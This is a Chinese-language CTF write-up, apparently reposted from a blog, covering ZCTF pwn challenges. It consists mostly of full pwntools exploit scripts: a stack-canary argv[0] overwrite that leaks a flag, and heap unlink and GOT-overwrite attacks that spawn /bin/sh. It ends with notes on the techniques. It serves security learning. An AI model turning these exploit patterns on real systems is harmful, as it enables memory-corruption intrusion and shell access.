Zctf-pwn

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Zctf-pwn相关的知识,希望对你有一定的参考价值。

    最近有了点时间,把ZCTF的pwn总结了下,就差最后一个pwn500,另找时间总结。

    文件打包:http://files.cnblogs.com/files/wangaohui/attach.zip

Pwn100

    很明显栈溢出,但是有canary保护。但是明显的是flag已经被读入了内存。在网上找到了dragonsector写的一个pdf,知道了当__stack_check_fail时,会打印出正在运行中程序的名称,如下:

技术分享

所以,我们只要将__libc_argv[0]覆盖为flag的地址就能将flag打印出来。POC:

 1 from pwn import *
 2 #context.log_level = ‘debug‘
 3 s = remote(115.28.206.86,22222)
 4 s.recvuntil(please guess the flag:)
 5 payload=ZCTF{+A*(32-5) + \\x00 + a*263 + p64(0x6010C5)
 6 s.sendline(payload)
 7 s.recvuntil(***: )
 8 flagt = s.recvuntil(\\n)[:27]
 9 flag  = ZCTF{
10 for i in flagt:
11         flag += chr(ord(i)^ord(A))
12 print flag
13 s.close()

 

技术分享

Pwn200-note1

技术分享

 1 from pwn import *
 2 #context.log_level = ‘debug‘
 3 io = remote(127.0.0.1,10001)
 4 def new(title, typ, content):
 5         io.recvuntil(Enter the title:)
 6         io.sendline(title)
 7         io.recvuntil(Enter the type:)
 8         io.sendline(typ)
 9         io.recvuntil(Enter the content:)
10         io.sendline(content)
11 def show():
12         io.recvuntil(content=)
13         io.recvuntil(\\n)
14         io.recvuntil(title=)
15         leak = io.recvuntil(,)
16         printfaddr = u64(leak)
17         print hex(printfaddr)
18 def edit(title, newc):
19         io.recvuntil(Input the note title:)
20         io.sendline(title)
21         io.recvuntil(Enter the new content:)
22         io.sendline(newc)
23         io.recvuntil(Modify success)
24 def delete(title):
25         io.recvuntil(Input the note title:)
26         io.sendline(title)
27         io.recvuntil(Delete success)
28 def pwn():
29         libcstartoff = 0x21A50
30         systemoff = 0x414F0
31         io.recvuntil(option--->>)
32         io.sendline(1)
33         new(111,aaa,a1a1)
34         io.recvuntil(option--->>)
35         io.sendline(1)
36         new(222,aaa,a1a1)
37         io.recvuntil(option--->>)
38         io.sendline(1)
39         new(333,aaa,a1a1)
40 
41         payload = a*0x100 + p64(0) + p64(0x171) + p64(0x0) + p64(0x602040-0x70) + 222 #p64(0x602018)
42         io.recvuntil(option--->>)
43         io.sendline(3)
44         edit(111, payload)
45 
46         io.recvuntil(option--->>)
47         io.sendline(2)
48         io.recvuntil(content=)
49         io.recvuntil(\\n)
50         io.recvuntil(content=)
51         io.recvuntil(\\n)
52         io.recvuntil(content=)
53         libcstart = io.recvuntil(\\n)[:-1].ljust(8,\\x00)
54         numlibcstart = u64(libcstart)
55         print leaked libc_start_main addr is  %x % numlibcstart
56         numsys = numlibcstart - libcstartoff + systemoff
57 
58         io.recvuntil(option--->>)
59         io.sendline(3)
60         edit(‘‘, a*40+p64(numsys))
61 
62         io.recvuntil(option--->>)
63         io.sendline(/bin/sh;)
64         io.interactive()
65 pwn()

Pwn400-note2

技术分享

 1 from pwn import *
 2 import time
 3 #context.log_level = ‘debug‘
 4 def new(s,length,content):
 5         s.sendline(1)
 6         s.recvuntil((less than 128))
 7         s.sendline(str(length))
 8         s.recvuntil(Input the note content:)
 9         s.sendline(content)
10 def edit(s,idf,c,content):
11         s.sendline(3)
12         s.recvuntil(Input the id of the note:)
13         s.sendline(str(idf))
14         s.recvuntil([1.overwrite/2.append])
15         s.sendline(str(c))
16         s.sendline(content)
17 def dele(s,idf):
18         s.sendline(4)
19         s.sendline(str(idf))
20         s.recvuntil(delete note success!)
21 def infoleak(s,idf):
22         s.sendline(2)
23         s.recvuntil(Input the id of the note:)
24         s.sendline(str(idf))
25         s.recvuntil(Content is )
26         return u64(s.recvuntil(\\n)[:-1].ljust(8,\\x00))
27 s= remote(127.0.0.1,10001)
28 time.sleep(2)
29 print pid of note2 is : + str(pwnlib.util.proc.pidof(note2)[0])
30 raw_input(go!)
31 s.recvuntil(Input your name:)
32 s.sendline(wah)
33 s.recvuntil(Input your address:)
34 s.sendline(ucas)
35 s.recvuntil(option--->>)
36 
37 globalptr = 0x602120
38 fakefd = globalptr - 0x18
39 fakebk = globalptr - 0x10
40 content = a*8
41 content += p64(0x91)
42 content += p64(fakefd)
43 content += p64(fakebk)
44 new(s,0x80,content)
45 s.recvuntil(option--->>)
46 new(s,0x0,a*8)
47 s.recvuntil(option--->>)
48 new(s,0x80,b*8)
49 s.recvuntil(option--->>)
50 dele(s,1)
51 s.recvuntil(option--->>)
52 
53 content = b*0x10
54 content += p64(0xa0)
55 content += p64(0x90)
56 new(s,0x0,content)
57 s.recvuntil(option--->>)
58 dele(s,2)
59 s.recvuntil(option--->>)
60 content = a*0x18 + p64(0x602088)
61 edit(s,0,1,content)
62 s.recvuntil(option--->>)
63 
64 atoiaddr = infoleak(s,0)
65 s.recvuntil(option--->>)
66 print atoi address is  + hex(atoiaddr)
67 systemaddr = atoiaddr - 0x36360 + 0x414F0
68 print system address is  + hex(systemaddr)
69 content = p64(systemaddr)
70 edit(s,0,1,content)
71 s.recvuntil(option--->>)
72 s.sendline(/bin/sh)
73 s.interactive()
74 s.close()

Pwn300-note3

技术分享

 1 from pwn import *
 2 import time
 3 #context.log_level = ‘debug‘
 4 def new(s,length,content):
 5         s.sendline(1)
 6         s.recvuntil((less than 1024))
 7         s.sendline(str(length))
 8         s.recvuntil(Input the note content:)
 9         s.sendline(content)
10 def edit(s,idf,content):
11         s.sendline(3)
12         s.recvuntil(Input the id of the note:)
13         s.sendline(str(idf))
14         s.recvuntil(Input the new content:)
15         s.sendline(content)
16 def dele(s,idf):
17         s.sendline(4)
18         s.recvuntil(Input the id of the note:)
19         s.sendline(str(idf))
20         s.recvuntil(Delete success)
21 def infoleak(s,idf):
22         s.sendline(4)
23         s.recvuntil(Input the id of the note:\\n)
24         s.sendline(str(idf))
25         time.sleep(1)
26         return u64(s.recvuntil(\\n)[:-1].ljust(8,\\x00))
27 s= remote(127.0.0.1,10001)
28 time.sleep(2)
29 print pid of note2 is : + str(pwnlib.util.proc.pidof(note3)[0])
30 raw_input(go!)
31 s.recvuntil(option--->>)
32 
33 globalptr = 0x6020C8
34 fakefd = globalptr - 0x18
35 fakebk = globalptr - 0x10
36 content = a*8
37 content += p64(0x91)
38 content += p64(fakefd)
39 content += p64(fakebk)
40 new(s,0x80,content)
41 s.recvuntil(option--->>)
42 new(s,0x0,a*8)
43 s.recvuntil(option--->>)
44 new(s,0x80,b*8)
45 s.recvuntil(option--->>)
46 dele(s,1)
47 s.recvuntil(option--->>)
48 
49 content = b*0x10
50 content += p64(0xa0)
51 content += p64(0x90)
52 new(s,0x0,content)
53 s.recvuntil(option--->>)
54 dele(s,2)
55 s.recvuntil(option--->>)
56 content = a*0x18 + p64(0x602018) + p64(0x602020) + p64(0x602070)
57 edit(s,0,content)
58 s.recvuntil(option--->>)
59 content = p64(0x400736)[:-1]
60 edit(s,0,content)
61 s.recvuntil(option--->>)
62 
63 putsaddr = infoleak(s,1)
64 s.recvuntil(option--->>)
65 print puts address is  + hex(putsaddr)
66 systemaddr = putsaddr - 0x6B9F0 + 0x414F0
67 print system address is  + hex(systemaddr)
68 content = p64(systemaddr)
69 edit(s,2,content)
70 s.recvuntil(option--->>)
71 s.sendline(/bin/sh)
72 s.interactive()
73 s.close()

    加深了对堆溢出的理解,linux下free时的unlink操作由于有check,并不能达到任意地址写,为了绕过check,能将变量ptr改为&ptr-0x18(64位系统下),&ptr-0xc(32位系统下)。也学到了一个新的泄漏内存的方法,就是如果能达到任意地址写的话,可以将某个.got.plt项(记为函数A)修改为puts在.plt的位置,这样在调用A时,就能调用puts函数造成信息泄露。Note2和note3都是整数溢出+堆溢出(fastbin+dwshoot)。

以上是关于Zctf-pwn的主要内容,如果未能解决你的问题,请参考以下文章